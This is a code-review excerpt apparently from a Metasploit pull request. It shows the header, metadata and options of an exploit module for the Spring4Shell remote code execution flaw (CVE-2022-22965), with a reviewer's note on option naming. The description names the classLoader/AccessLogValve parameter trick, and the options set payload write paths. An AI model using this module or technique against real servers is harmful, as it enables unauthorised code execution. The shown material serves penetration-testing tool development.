modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -0,0 +1,289 @@
+
+  Rank = ManualRanking # It's going to manipulate the Class Loader
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Framework Class property RCE (Spring4Shell)',
+        'Description' => %q{
+          Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
+          and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
+          to remote code execution due to an unsafe data binding used to populate an object from request parameters
+          to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
+          org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
+          class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
+          gain remote code execution.
+        },
+        'Author' => [
+          'vleminator <vleminator[at]gmail.com>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-22965'],
+          ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],
+          ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
+        ],
+        'Platform' => %w[linux win],
+        'Payload' => {
+          'Space' => 5000,
+          'DisableNops' => true
+        },
+        'Targets' => [
+          [
+            'Java',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => %w[linux win]
+            },
+          ],
+          [
+            'Linux',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Windows',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-03-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Spring4Shell', 'SpringShell'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
+        OptString.new('FILEDROPPER_DIR', [ false, 'Path to write the filedropper (only applicable to non-Java targets)', '/tmp/']),
```

Comment:
We typically call this option `WritableDir` and register it as an advanced option. See [this example](https://github.com/rapid7/metasploit-framework/blob/04f042ae478aebe7d79e69501b3b76c40eaf1f99/modules/exploits/unix/local/setuid_nmap.rb#L57).